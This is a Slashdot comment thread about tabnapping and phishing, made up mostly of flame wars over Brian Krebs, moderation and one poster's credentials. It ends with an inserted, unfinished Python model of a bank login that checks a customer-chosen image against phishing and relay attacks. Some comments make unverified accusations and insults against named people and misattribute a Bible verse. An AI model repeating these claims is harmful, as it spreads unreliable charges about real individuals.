    Calling Brian Krebs some kind of expert or authority on this arena of computer sciences? A mistake, and a huge LOGICAL one!

    (Krebs has nothing to his credit in this science in degrees that establish his expertise according to educational standards, and I also DOUBT STRONGLY he has put in his "time in the trenches" either in Computer Security, Networking, OR PROGRAMMING as well which might help establish him as more of an "authoritative figure").

    You? LOL, my man... I have to thank you, for defeating YOURSELF ON THE VERY GROUNDS YOU USE YOURSELF:

    You just failed a major tenet of logic, in your "appeal to incorrect authority" by the way, because Brian Krebs is by no means, an authoritative figure in this science, let alone the specific niche in computer security (he's more of a hobbyist, and thus, no more qualified than scamdetect here is)...

    However, since you critiqued ME? See this list, show me you (or Krebs) have done more or better in this field:

    "My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."

    ----

    Windows NT Magazine (now Windows IT Pro) April 1997 "BACK OFFICE PERFORMANCE" issue, page 61

    (&, for work done for EEC Systems/SuperSpeed.com on PAID CONTRACT (writing portions of their SuperCache program increasing its performance by up to 40% via my work) albeit, for their SuperDisk & HOW TO APPLY IT, took them to a finalist position @ MS Tech Ed, two years in a row 2000-2002, in its HARDEST CATEGORY: SQLServer Performance Enhancement).

    WINDOWS MAGAZINE, 1997, "Top Freeware & Shareware of the Year" issue page 210, #1/first entry in fact (my work is there)

    PC-WELT FEB 1998 - page 84, again, my work is featured there

    WINDOWS MAGAZINE, WINTER 1998 - page 92, insert section, MUST HAVE WARES, my work is again, there

    PC-WELT FEB 1999 - page 83, again, my work is featured there

    CHIP Magazine 7/99 - page 100, my work is there

    GERMAN PC BOOK, Data Becker publisher "PC Aufrusten und Repairen" 2000, where my work is contained in it

    HOT SHAREWARE Numero 46 issue, pg. 54 (PC ware mag from Spain), 2001 my work is there, first one featured, yet again!

    Also, a British PC Mag in 2002 for many utilities I wrote, saw it @ BORDERS BOOKS but didn't buy it... by that point, I had moved onto other areas in this field besides coding only...

    Lastly, being paid for an article that made me money over @ PCPitstop in 2008 for writing up a guide that has people showing NO VIRUSES/SPYWARES & other screwups, via following its point, such as THRONKA sees here -> http://www.xtreme

    1. Re:You FAIL logic (appeal to incorrect authority) by NeutronCowboy · · Score: 1

      "My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."

      Oh the bold lettering, the all-caps, the irony that is the quote... Your post wouldn't be nearly so hilarious without it. Thanks again for a good laugh.

      By the way Andrew, let me know when you get a citation for an article in a peer-reviewed journal that is at least semi-recent. It'll make the copy-pasting of your minimal accomplishments that much more entertaining.

      --
      Those who can, do. Those who can't, sue.
  47. Rich web experience requires vigilance by users by rjamestaylor · · Score: 1

    As the richness of the web experience increases due to interactive technologies available on the client-side, unscrupulous people work to catch people off-guard for their own advantage. At the most benign level this is done by advertisers seeking to gain attention. At the worst, thieves use client-side scripting as a virtual pickpocket tool.

    When possible I remind my family members to stay on alert when on-line (or even off-line). This includes not clicking on links in email, of course. It also includes not logging into a service unless they have entered the URL themselves or used a bookmark they have set up. Yes, this does not prevent MitM attacks and will not protect them from a scheme that changes a browser's bookmarks. But it solves the bulk of the phishing attacks to date.

    One reason I prefer specialized apps for important services (banking, on-line status update services, email) over using a generic web interface is that specialized apps are less prone to be faked by XSS, phishing look-a-like pages, etc. This is especially true of closed platform apps like iPhone/iPad apps that undergo an approval process by a third party.

    Sad as it is to admit, one benefit to the lack of "freedom" on the iPhone/iPad platform is protection from scammers.

    What is an open alternative to protecting the unaware from these scams? I'm all ears.

    --
    -- @rjamestaylor on Ello
  48. So by Anonymous Coward · · Score: 0

    So don't use tabs..."tabbed browsing" sucks anyway.

  49. Re:Does Brian Krebs have a CISSP or A.A.S/B.S. in by mcgrew · · Score: 1

    otherwise, you're appearing to myself as another "let's butter up the owners/mods at slashdot" type

    Ok, I'll clear up a few things:

    1. My subscription was paid by an anonymous donor who probably enjoys my journals, although I'm glad I have it
    2. Check the "achievements" page and you'll see "the comedian", which means I make joke comments often enough to get "+5 funny"s despite the danger of making funny comments ("funny" gains no karma yet is often modded troll or flamebait)
    3. I very often argue (albeit politely) with Pudge, an admin here, whose politics don't often agree with mine
    4. None of my own submissions link anything I've written

    Yes, there are people with alternate logons; but I've had exactly two; this one, and when I lost my password for a time used this one. One would think that a person would friend alternate identities; you really think I have over 200 alternate identities?

    The fact is, I'm simply a longtime slashdot reader who loves the site and tries to contribute the best I can.

    As to "mods", I post too often to get mod points (although I get metamod points).

    we're not foolish enough to register here to be easily tracked for trolling registered users

    Too bad you're not registered, because you'll probably not see my reply. That's an advantage of being logged on -- you're informed of replies to your comments and can have an intelligent conversation with people way more knowledgeable and intelligent than me; one of the great things about this site is you can actually LEARN stuff sometimes from some of the comments. Scientists from all sorts of disciplines, engineers, designers, from all over the world post here. You're not going to find discussions like you see here at DIGG, or anywhere else for that matter.

  50. Additionally? See your quote on BLOGS (Krebs, IS) by Anonymous Coward · · Score: 0

    Requoting you, on blogs, per my subject line:

    "Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot." - by mcgrew (92797) * on Tuesday May 25, @10:18AM (#32335816)

    First of all, "Krebs on Security"? It's a BLOG, correct? I'm pretty sure it is, so you either are joking or are contradicting yourself...

    "Yes, there are people with alternate logons; but I've had exactly two; this one, and when when I lost my password for a time used this one. One would think that a person would friend alterate identities; you really think I have over 200 alternate identities?" - by mcgrew (92797) * on Tuesday May 25, @02:34PM (#32339464)

    Thanks for making my point, that's a possibility (others are for others that 'support themselves' via multiple alternate logons as registered users too are another though, & that's what I allude to actually)... there is also another case you omit: WHEN SLASHDOT MODERATORS HERE DELETE OTHERS' ACCOUNTS TOO, AS NOTED HERE:

    ----

    http://slashdot.org/comments.pl?sid=1640368&cid=32155438

    "so if you try to block all of my posts like the other one that are here then every thing i have heard about the moderators is true and all of the Slashdot moderators is nothing but a bunch of losers that can not handle the truth, and if you think taking my account and destroying kingersjokwers was going to stop me from posting the facts then you are out of your mind" - by kingsjokers (1808300) on Monday May 10, @10:52AM (#32155438)

    ----

    "The fact is, I'm simply a longtime slashdot reader who loves the site and tries to contribute the best I can." - by mcgrew (92797) * on Tuesday May 25, @02:34PM (#32339464) Journal

    Same here, but, when I see the likes of what is in bold above, and what's gone on with spamdetect here too and his posting being altered to cater to what appears to be a 'crony' (or, shall we say "affiliate", lmao) site for this one, & I'm not the only one noting it here either, this person has as well -> with the same sentiment.

    When I see /. mods:

    1.) Unfairly apparently burning others accounts, stopping them from submitting posts or points in doing so:

    http://slashdot.org/comments.pl?sid=1640368&cid=32155438

    "so if you try to block all of my posts like the other one that are here then every thing i have heard about the moderators is true and all of the Slashdot moderators is nothing but a bunch of losers that can not handle the truth, and if you think taking my account and destroying kingersjokwers was going to stop me from posting the facts then you are out of your mind" - by kingsjokers (1808300) on Monday May 10, @10:52AM (#32155438)

    2.) Trying to do the same to others (or, lol, TRYING to & failing, lol -> http://slashdot.org/comments.pl?sid=1640368&threshold=-1&commentsort=0&mode=thread&pid=32085128 as they did with myself & others too there)

    3.) Then the mods here also stopping threads early when the mods/owners or their pals "bit off more than they could chew" with facts vs. their fictions (soppsa & red flayer mods here afaik (red says he is, soppsa I am NOT 110% sure of though))?

    "Germany warns users against Firefox" here http://slashdot.org/comments.pl?sid=1640368&cid=32111672

    They closed a thread 2 weeks early there, last month, on Firefox vs. Opera where I debated it with a user here named clone53421.

  51. Let's place the blame where the blame is due. by penguinman1337 · · Score: 1

    Damn you Opera! If you hadn't invented tabbed browsing, none of this would have happened!!

  52. Where's your "LOGIC" (illogic is more like it) NOW by Anonymous Coward · · Score: 0

    ?

    Answer the question above in my subject-line & of course, where you tried your "ILLOGIC LOGIC" on me, here, trying to pitifully 'troll' me -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32338386 ... lol!

    (Take a course in logic, won't you, first, before trying to tell us how "logic works", lol!)

    APK

    P.S.=> Windows IT Pro magazine which I had work featured in that I made better by up to 40% due to work on block device driver parameterization & data placements + more?

    Well, lol, IT IS TRULY, a "review by peers", because in case you haven't noticed?? Dr. Mark Russinovich, PHD, of Microsoft writes for them...

    (So you know: What is/was "Windows NT Mag" where my works featured while you were still in diapers?? It is the forerunner of "Windows IT Pro" mag)...

    Also, when you can show you have code in commercial products as I do, well... especially ones that have done really well (such as at Microsoft Tech Ed 2000-2002 as a finalist in its HARDEST CATEGORY, 2 yrs. in a row, & again, most likely whilst you were in diapers (again, lol))??

    When you can evidence more than 16++ yrs. of professional experience in this field coding, network engineering, and far more in as I can???

    Well... then, & ONLY THEN, can you talk as you have to me, especially your first reply!

    (QUESTION - Do you have a degree in CSC or CIS/MIS even? Your outright laughable blunder on logic evidences otherwise, lol, in your initial post (per my subject-line))...

    So all the name tossing in the world & attempts @ "sly ridicule" (is your fav. color 'transparent' or what)? Useless, & again, especially what you said about me initially calling me a "nincompoop" (the last resort of the troll usually is name tossing by the by), when I am actually someone who HAS TAKEN, & DONE WELL IN, LOGIC FORMALLY IN COLLEGIATE ACADEMIA?

    LOL, you blew that too, badly, by your fail in the use of "appeal to an incorrect authority", lol, while trying to tell ME my logic was poor! You, obviously, only know "forums 'illogic logic'" (as Tom Baker as Dr. Who called it, lol, "illogic logic")!

    Hilarious, & again: "too, Too, TOO EASY!"... just too easy! apk

  53. Re:Where's your "LOGIC" (illogic is more like it) by NeutronCowboy · · Score: 1

    Alexander Peter Kowalski (since you insist on people using your full name), thank you for that morning of entertainment. Your level of delusion and OCD-ness is both side-splittingly hilarious and saddening. It's like watching a train-wreck. I know I shouldn't laugh, but the self-inflicted nature of the wreck is what makes it so damn funny.

    --
    Those who can, do. Those who can't, sue.
  54. More predictable namecalling, last resort o trolls by Anonymous Coward · · Score: 0

    "Alexander Peter Kowalski (since you insist on people using your full name), thank you for that morning of entertainment. Your level of delusion and OCD-ness is both side-splittingly hilarious and saddening. It's like watching a train-wreck. I know I shouldn't laugh, but the self-inflicted nature of the wreck is what makes it so damn funny." - by NeutronCowboy (896098) on Tuesday May 25, @05:04PM (#32341426)

    Well, see subject-line above, & I could not fit in the ENTIRE truth of it, in "DEFEATED TROLLS" (regarding yourself, a self-defeating troll, lol, no less)

    I mean, hey: Your "illogic logic" here, lol -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32338386 was utterly hilarious!

    (That URL above's for others reading here, because NeutronCowboy "nuked himself" right out of the gate, lol, on LOGIC (never even having taken it himself, failing badly in logic no less himself via "appeals to an incorrect authority", AND LASTLY, He obviously never has taken logic (or the topic of this thread, in Computer Sciences related material) academically either because CSC demands usually you take LOGIC... All the while, with "Nuked Cowboy" (lol) here blowing it on that too, & yet attempting to berate + ridicule me who has in academia during CSC degrees work here, & myself actually having done well academically @ LOGIC courses no less too)).

    Man - "Nuff said", & "too, Too, TOO EASY" about 'sums it up' for me in that URL above... lmao!

    APK

    P.S.=> By the way, the initial "nincompoop" insinuation you literally stated & tried to direct MY way, especially regarding having taken LOGIC (when I have)? Hilarious, but you also violating a tenet of logic in your misuse of "appeal to an incorrect authority" clearly evidences that now all you have is your name calling... the LAST RESORT of the fallen troll, every time! apk

  55. Banking (etc) in Freshly opened windows only by IBitOBear · · Score: 1

    The real smart users don't do "real things" via "go back" or "left open" windows. When I bank etc, I use a freshly opened window (if not always browser, but one can only be so paranoid) opened with file-new not ctrl-n etc. Then I do my business and get out.

    Sure my slashdot.org and my social and dating site kinda crap stays logged in, but so what.

    If it's real business I don't go there unless I typed the URL by hand. I don't even bookmark the sites for my bank and credit card etc because _I_ have been expecting the bookmark rewriting attack as more likely than tab reassignment. But who am I to judge...

    --
    Innocent people shouldn't be forced to pay for inferior software development.
    --"Code Complete" Microsoft Press
  56. People aren't stupid, others see the same by Anonymous Coward · · Score: 0

    "You have evidence of this accusation against the integrity of Slashdot's Editors and (therefore) the Slashdot site itself?" - by mysidia (191772) on Tuesday May 25, @08:48PM (#32343692)

    Per my subject line above? This is only a SMALL SAMPLE from this thread where others have noted the same (see url below, it's another respondent here stating that /. tends to "favor" KrebsOnSecurity, because of the mods directing traffic to B. Krebs blog, via altering the original submission for story by the poster scamdetect):

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196

    Nuff said (& I didn't say it either that time, so, good enough for you? It ought to be, & there are others like it here as well besides his statement there).

    ----

    "You claim the foregoing, and yet, you are posting this anonymously, and not identifying yourself, or showing any cause that permits an unbiased reader to believe you actually possess credentials like that (other than you claim to have them)." - by mysidia (191772) on Tuesday May 25, @08:48PM (#32343692)

    OH, I suppose for the first item in this list, you could email Mr. Eric Dickman (CEO of SuperSpeed.com, a certified Microsoft Partner) in regards to paid work I ended up doing for his company as EEC Systems back in 1996 that made their SuperCache/SuperCache II block device driver level diskcache up to 40% better for example (easiest one for you to verify I guess would be that, from this list below):

    "My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."

    ----

    Windows NT Magazine (now Windows IT Pro) April 1997 "BACK OFFICE PERFORMANCE" issue, page 61

    (&, for work done for EEC Systems/SuperSpeed.com on PAID CONTRACT (writing portions of their SuperCache program increasing its performance by up to 40% via my work) albeit, for their SuperDisk & HOW TO APPLY IT, took them to a finalist position @ MS Tech Ed, two years in a row 2000-2002, in its HARDEST CATEGORY: SQLServer Performance Enhancement).

    WINDOWS MAGAZINE, 1997, "Top Freeware & Shareware of the Year" issue page 210, #1/first entry in fact (my work is there)

    PC-WELT FEB 1998 - page 84, again, my work is featured there

    WINDOWS MAGAZINE, WINTER 1998 - page 92, insert section, MUST HAVE WARES, my work is again, there

    PC-WELT FEB 1999 - page 83, again, my work is featured there

    CHIP Magazine 7/99 - page 100, my work is there

    GERMAN PC BOOK, Data Becker publisher "PC Aufrusten und Repairen" 2000, where my work is contained in it

    HOT SHAREWARE Numero 46 issue, pg. 54 (PC ware mag from Spain), 2001 my work is there, first one featured, yet again!

    Also, a British PC Mag in 2002 for many utilities I wrote, saw it @ BORDERS BOOKS but didn't buy it... by that point, I had moved onto other areas in this field besides coding only...

    Lastly, being paid for an article that made me money over @ PCPitstop in 2008 for writing up a guide that has people showing NO VIRUSES/SPYWARES & other screwups, via following its point, such as THRONKA sees here -> http://www.xtremepccentral.com/forums/showthread.php?s=ee926d913b81bf6d63c3c7372fd2a24c&t=28430&page=3

    ----

    What do I have to say about that much above? I can't say it any better, than this was stated already (from the greatest book of all time, the "tech manual for life" imo):

    "But by the grace of God I am what I am: and his grace which was bestowed upon me was not in vain; but I labored more abundantly than they all: yet not I, but the grace of God which was with me." - Corinthians Chapter 10, Verse 10

    (And, because I got LUCKY to ha

  57. Name tossing? A logical fallacy again by you by Anonymous Coward · · Score: 0

    "Ah.... the moral relativism argument. How do I miss thee.... wait, I don't. It's guaranteed to be brought up by some nincompoop who missed Logic and Philosophy in his education." - by NeutronCowboy (896098) on Tuesday May 25, @01:06PM (#32338036)

    Funny how you won't show you have taken, and passed, a formal logic course... because you obviously have not, per the below evidences thereof and your own poor showing in the use of logic in debate!

    LOL, not only did you:

    1.) "Appeal to an incorrect authority" (another logical fallacy, because B. Krebs whom slashdot moderators unjustly altered scamdetect the story submitters post here for with one of their own sources? IS an unqualified one no less (because B. Krebs has no CSC, or CIS/MIS degrees, industry hands on experience in the trenches in networking, programming, OR SECURITY, nor does he have a CISSP cert. to his name either - he's really no authority on this subject because of the lack of those things showing he is)!

    2.) You're now, and originally as well from the onset of your replies to me here, also resorting to this logic fallacy as well (failing badly yet again & yet you said what you did above? Please...):

    Ad Hominem This is committed when we attack a person and not his arguments.

    (More evidence to that, directed my way in your name calling attacks & insinuations (as well as your delusions of grandeur, lol, in imagining yourself a licensed practicing psychiatrist as well no less apparently based on what you state below) from you exists below in this quote as well)

    "I don't know if it is the foaming-at-the-mouth superiority complex" - by NeutronCowboy (896098) on Tuesday May 25, @01:06PM (#32338036)

    Ahem: Care to produce your PHD in Psychiatry, as well as your license to practice it? Have you performed a formal evaluation of myself in professional settings as well to make your "prognosis/diagnosis", Dr. Quack? No to all of the above???

    Thought so. You're libeling me if you don't have those things you know...

    (By the way? Thanks for the (sort of) "Freudian Slip", in your basically insinuating you feel I am "superior" - you give away a lot, & I strongly suggest you never, EVER play poker... you tip your hand & show your tell, way too easily!)

    APK

    P.S.=> LOL, all in all: You should not have brought logic into this, name calling & all as you have (directing it my way), because you've failed on those grounds, HUGELY, no less... lmao! You chose your nickname/handle here, you are truly, The "NUKED COWBOY" (because the flames & smoke from your 'showing' here? Man, they're POURING off of you now, because of it)... apk

  58. still the same by Anonymous Coward · · Score: 0

    It still all boils down to the fact of clicking on a suspect website link...
    Dont click on dodgy links -->and you have no issues!

  59. Looks like I got it wrong by scamdetect · · Score: 0

    Perhaps I have misjudged the purpose of the Slashdot website and perhaps I owe its creators/owners/moderators an apology. It appears that whilst relying upon user input for its existence (and the time said users take to craft meaningful and useful content) it is the prerogative of the owners to take said content and rewrite it in the interests of the reader. As a blogger, I find this concept difficult to understand as when guest bloggers or contributors provide content for my website, I ensure that their links are preserved as written to give them the benefit of subsequent referral traffic. I had not realised that the courtesy of reciprocity did not apply to slashdot contributors. For my ignorance in this matter, I apologise.

  60. Not "set off" here: Just "righteously indignant by Anonymous Coward · · Score: 0

    "LOL, now you've done it, you've set APK off." - by Anonymous Coward on Wednesday May 26, @02:11AM (#32345400)

    Per my subject above, I'm far from "set off": I just feel the same "righteous indignation" that scamdetect does, because the moderators here have LITERALLY tried to 'snuff out' my ability to post here a few times (and they failed at it, & quit doing it), and I do not mean the "10 posts per 24 hour limit" that is imposed on those of us that post as "anonymous coward" (better than being an easily tracked for getting trolled registered user imo - because I've got my own "little fanclub" of trolls online and here that try to 'get my goat' that way, & doing AC posts here protects me from that type of thing occurring is all. Otherwise, I'd be a registered user here!)...

    The mods here also have closed threads way, Way, WAY earlier than normal as well when I was getting the better of one of their cronies/pals in clone53421 (when I showed that Firefox had 3 security vulnerability errors in 1 week's time and Opera had ZERO & is just plain faster and has more features "built in natively" by far, than Firefox does (with less vulnerabilities than FF addons do also historically)).

    I just do NOT like what I feel are "injustices done" online, or otherwise. A lot of folks keep their mouths shut and stay out of things, & many times I do the same - this is not one of those times though, because I know how it feels.

    So, do I understand HOW scamdetect feels, when the mods here altered his story submission posting to point to a "crony" of theirs, vs. using the source scamdetect posted?

    Absolutely.

    That's VERY UNPROFESSIONAL EDITORIAL WORK, and with obvious "ulterior motives" also... & I am not the only person who felt that way here (scamdetect certainly did, that's no secret, but there are others here who saw the same as I as well, a list of their posts are below in url linkage form in this very thread):

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32334930

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32335816

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32336338

    (Want more? Folks in those posts are noticing how OFTEN slashdot's "editorial staff" here link to B. Krebs BLOG, and he has no more qualifications than does the story submitter in this area, Computer Sciences and specifically of a security-oriented focus (hell, I have more under my belt BY FAR than Mr. Krebs does, which only shows that the editors of /. have chosen a source that's really NOT that "expert" or "credible" (albeit, to Krebs' credit, he doesn't CLAIM TO BE AN EXPERT @ least)).

    APK

    P.S.=> Others realize that /. OFTEN "follows its own agenda", but their favorite color MUST BE 'TRANSPARENT', because as the saying goes, "it's ALL about the 'benjamins'", & perhaps /. feels that B. Krebs (because of the sites he is "affiliated with" are more largely travelled than is scamdetect's, but in the end, it turns up that Krebs is no more qualified as a valid expert on this subject matter than is scamdetect (and neither Krebs nor scamdetect are the original discoverers of this news' topic either, mind you - they're only both relaying it to the rest of us is all, so imo @ least? BOTH sources should be cited, out of fairness, if anything - that's all!))... apk

  61. THOR SCHMUCK & CA? Take a read... lmao! by Anonymous Coward · · Score: 0

    "THOR SCHMUCK"? LMAO, well, people can read there, and see that he refused to answer my points there when I replied (on PING.EXE, SPYBOT SEARCH & DESTROY, & MORE)

    He is, afaik, the one that submitted my app to CA as a malware (& it's not intended for that kind of use, I wrote it in good faith for a forums guy that wanted a way to launch OLD Apache server for Windows like a service, invisibly, & since that's only 1-2 lines of code to do? I did!).

    CA, now there's a story. Ask Computer Associates about their being caught in a millions of dollars financial/accounting scam, here:

    http://www.associatedcontent.com/article/215116/computer_associates_cofounder_led_22.html

    Real reputable company, eh?

    In fact, I passed every single one of the 21 questions for removal of my ware from their site, & all they ended up doing was lowering it down to a "zero threat level"... but, I'm not too concerned about it, because they also do it to others (along with other Antivirus/Antispyware companies, and we all know how "effective" those are, especially lately vs. today's "blended threats").

    Ask Dr. Mark Russinovich of Microsoft or Nir Softer of NIRSOFT if they've ever had their numerous apps libeled along with themselves in the same manner... (answer = they have, so I suppose I am in "good company" here, eh?)

    Thor Schrock, lol, another "credible expert" (NOT): That guy doesn't even have a CSC degree or even a single A+ type certification to his name.

    APK

    P.S.=> All I can say to and about Thor SCHMUCK, is this: GOD BLESS TY TYMKOVICH (LOL, run that by him, it ought to be good for a laugh... the fool got wickedly SUCKERED by him to the tune of $5,500)... apk

  62. THOR "SCHMUCK" & NOT-MAN #1, JEREMY REIMER? by Anonymous Coward · · Score: 0

    "THOR SCHMUCK"? LMAO, well, people can read there, and see that he refused to answer my points there when I replied (on PING.EXE, SPYBOT SEARCH & DESTROY, & MORE)

    He is, afaik, the one that submitted my app to CA as a malware (& it's not intended for that kind of use, I wrote it in good faith for a forums guy that wanted a way to launch OLD Apache server for Windows like a service, invisibly, & since that's only 1-2 lines of code to do? I did!).

    CA, now there's a story. Ask Computer Associates about their being caught in a millions of dollars financial/accounting scam, here:

    http://www.associatedcontent.com/article/215116/computer_associates_cofounder_led_22.html

    Real reputable company, eh?

    In fact, I passed every single one of the 21 questions for removal of my ware from their site, & all they ended up doing was lowering it down to a "zero threat level"... but, I'm not too concerned about it, because they also do it to others (along with other Antivirus/Antispyware companies, and we all know how "effective" those are, especially lately vs. today's "blended threats").

    Ask Dr. Mark Russinovich of Microsoft or Nir Softer of NIRSOFT if they've ever had their numerous apps libeled along with themselves in the same manner... (answer = they have, so I suppose I am in "good company" here, eh?)

    Thor Schrock, lol, another "credible expert" (NOT): That guy doesn't even have a CSC degree or even a single A+ type certification to his name.

    All I can say to and about Thor SCHMUCK, is this: GOD BLESS TY TYMKOVICH (LOL, run that by him, it ought to be good for a laugh... the fool got wickedly SUCKERED by him to the tune of $5,500)...

    ----

    JEREMY REIMER??

    He got caught by his ISP, Shaw in Canada, for email harassing me as well as impersonating me on his website (along with death threats from he & his pal Jay Little which ended up with a detective Felton in B.C. Canada where Reimer lives taking care of the rest for me).

    LOL, Reimer's SO UNQUALIFIED, he had to try to bring others, much to his own dismay... especially Fat Jay Little!

    Jay Little, who claimed to be an "Exchange Expert" @ Windows IT Pro forums, and when I showed him that MICROSOFT'S OWN DOCUMENTATION PROVED THAT MEMORY OPTIMIZERS COULD RESTART A STALLED EXCHANGE SERVER? Jay Little had to eat his own "self-proclaimed" expert status on Exchange, and left in shame... but, not without stalking me to NTCompatible.com, & getting himself banned there (as he has been at Microsoft's Channel 9 before also for similar stupidities), but also blowing it AGAIN, badly, on ramdisk and their uses plus windows crash dump analysis messages determinations too...

    Big comedy & "too, Too, TOO EASY" for me!

    This in turn, ended up with death threats from Reimer and Little on their websites, and ended up with CrystalTech.com removing Jay Little's website IN ITS ENTIRETY (forcing him to lol, find another hosting provider) and portions of Reimer's site also being forcibly removed... after Reimer libeled me, made threats to me, and far more.

    APK

    P.S.=> So much for your "links", because you're only helping me show those 2 as the undereducated & blatantly unqualified FOOLS they are in this art & science! Thank you in fact... Additionally, thank you for showing us all, AGAIN, that slashdot & its cronies like you, are just not THAT GOOD @ picking "experts" (just like this post's use of B. Krebs over the post submitter's source, scamdetect, & the editors here doing that blunder VERY UNPROFESSIONALLY in their editing no less)... apk

  63. CmdrTaco's site can die just like others have by Anonymous Coward · · Score: 0

    See subject-line, because it's what starts to kill forums when owners or their moderators begin abusing their viewership or news posters. It's happened before, and can happen again (here too, this place is not by any means unique on that account). When site editors and such begin doing what many others noted here as very unprofessional editorial work, that website usually starts to die or is on the way there already.

  64. Simple Solution by Anonymous Coward · · Score: 0

    http://noscript.net/ for every site you don't explicitly trust

  65. You're also a HYPOCRITE, see inside... apk by Anonymous Coward · · Score: 0

    "No one here knows the entire story and making judgement to the otherwise is sad." - by jwl17330536 on Monday April 05, @04:54PM (#31740740)

    You've said it yourself, and shot yourself down on the SAME grounds, and were shown in that same type of error here:

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32356452

    and, here:

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32356288

    So, thanks for only showing you're obviously yet another one of the types you yourself dislike, and that you're also a hypocrite.

    (That's the hilarious part here: You "almighty registered users" here often fail to realize that your own posting histories and words can often be used against you to show you just have your "convenient views and convictions" when they suit you, and that you often 'flip the script' on them, when it suits you also)

    APK

    P.S.=> Additionally, by your use of the falsehoods you yourself used without your knowing the entire story (though it was there for you to read in Thor SCHMUCK's posting)? You've also helped my case (and I have a winning one per an attorney out of Rochester N.Y., vs. CA & Thor Schrock to the tune of $150,000 U.S. Dollars) you've also shown that others are believing their misleading libel of myself... apk

  67. Really good bank security by Keybounce · · Score: 1

    My bank has what I consider to be really good security.

    My login page just asks for my account number.
    Then, the bank proves who it is to me -- by showing me a picture of my choosing and a passphrase of my choosing -- before it asks me for my password.

    In other words, before it asks me to give a secret away, it verifies itself with a secret.

    As if that weren't good enough, on any browser that I haven't registered, it gives me a challenge question. So, to fake this, even if the scammer managed to get my account name and password, it doesn't have the browser credential, and can't get past the security question; it can't pretend to be my bank because it doesn't know my picture and passphrase (only delivered over SSL), etc.

    To clarify: I give my account number. If it is playing MITM, it gets a challenge question, which it can't answer and I know is invalid if it passes it to me; if it wants to bypass that and just ask for my password, it doesn't know what image/phrase to show; it can't play transparent MITM and watch because of SSL security and lack of browser private key credential. That's the best security I've seen so far. Just fails to keylogging software, but that's what a PPC mac is for :-).
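    An added worked example (editor's code, not Keybounce's bank's and not from the original post) of the layered login the comment above describes: account number first, the bank shows the customer's chosen image and phrase before asking for a password, and an unregistered browser also gets a challenge question. The class names, the account data and the two phishing pages are constructed for illustration. It models the genuine flow, a tabnapped form that does not know the image, and a page that relays the account number to the real bank to fetch the genuine image; the relay has no registered-device token, so the bank's reply carries a challenge, which is the signal a customer on a registered browser can act on.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed example of the two-step, device-bound bank login described above.
# Bank, Customer, NaivePhisher and RelayPhisher are hypothetical names.


def _hash_pw(pw: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 50_000)


@dataclass
class Account:
    salt: bytes
    pw_hash: bytes
    image: str                 # customer-chosen anti-phishing image
    phrase: str                # customer-chosen anti-phishing phrase
    question: str              # challenge asked on unregistered browsers
    answer: str
    devices: set = field(default_factory=set)   # registered browser tokens


class Bank:
    def __init__(self):
        self.accounts = {}

    def enroll(self, number, password, image, phrase, question, answer):
        salt = secrets.token_bytes(16)
        self.accounts[number] = Account(salt, _hash_pw(password, salt),
                                        image, phrase, question, answer)

    def identify(self, number, device_token=None):
        """Step 1: only the account number arrives. The bank proves itself with
        the secret image/phrase and adds a challenge if the browser is unknown."""
        acct = self.accounts.get(number)
        if acct is None:
            return None
        registered = device_token in acct.devices
        return {"image": acct.image, "phrase": acct.phrase,
                "challenge": None if registered else acct.question}

    def authenticate(self, number, password, device_token=None, answer=None):
        """Step 2: password, plus the challenge answer on unregistered browsers.
        Returns a device token on success (fresh if the browser was unknown)."""
        acct = self.accounts.get(number)
        if acct is None or not hmac.compare_digest(_hash_pw(password, acct.salt), acct.pw_hash):
            return None
        if device_token in acct.devices:
            return device_token
        if answer is None or not hmac.compare_digest(answer.lower(), acct.answer.lower()):
            return None
        token = secrets.token_hex(16)
        acct.devices.add(token)
        return token


class Customer:
    """Checks the image/phrase before typing the password, and treats a
    challenge on an already-registered browser as a sign the far end is not the bank."""
    def __init__(self, number, password, image, phrase, answer):
        self.number, self.password, self.answer = number, password, answer
        self.image, self.phrase = image, phrase
        self.device_token = None

    def login(self, site):
        step1 = site.identify(self.number, self.device_token)
        if step1 is None or (step1["image"], step1["phrase"]) != (self.image, self.phrase):
            return "abort:no_sitekey"            # password is never sent
        if step1["challenge"] and self.device_token is not None:
            return "abort:unexpected_challenge"  # registered browser should not be challenged
        ans = self.answer if step1["challenge"] else None
        token = site.authenticate(self.number, self.password, self.device_token, ans)
        if token is None:
            return "rejected"
        self.device_token = token
        return "ok"


class NaivePhisher:
    """A tabnapped login form that knows none of the customer's secrets."""
    def __init__(self):
        self.captured = []

    def identify(self, number, device_token=None):
        return {"image": "generic_lock.png", "phrase": "Welcome back!", "challenge": None}

    def authenticate(self, number, password, device_token=None, answer=None):
        self.captured.append((number, password, answer))
        return "bogus"


class RelayPhisher:
    """Forwards every message to the real bank; it holds no device token."""
    def __init__(self, bank):
        self.bank, self.captured = bank, []

    def identify(self, number, device_token=None):
        return self.bank.identify(number, None)

    def authenticate(self, number, password, device_token=None, answer=None):
        self.captured.append((number, password, answer))
        return self.bank.authenticate(number, password, None, answer)


def run_scenarios():
    bank = Bank()
    bank.enroll("12345678", "correct horse", "red_kayak.jpg", "Tuesdays are pie", "First pet?", "Rex")
    alice = Customer("12345678", "correct horse", "red_kayak.jpg", "Tuesdays are pie", "Rex")
    naive, relay = NaivePhisher(), RelayPhisher(bank)
    results = {"first_login": alice.login(bank),     # challenge answered, token issued
               "second_login": alice.login(bank)}    # registered browser: no challenge
    results["naive_phish"] = alice.login(naive)      # wrong image: stops before the password
    results["relay_phish"] = alice.login(relay)      # genuine image, but an unexpected challenge
    results["captured"] = naive.captured + relay.captured
    # Caveat: a browser that was never registered cannot tell the relay from the bank.
    bob = Customer("12345678", "correct horse", "red_kayak.jpg", "Tuesdays are pie", "Rex")
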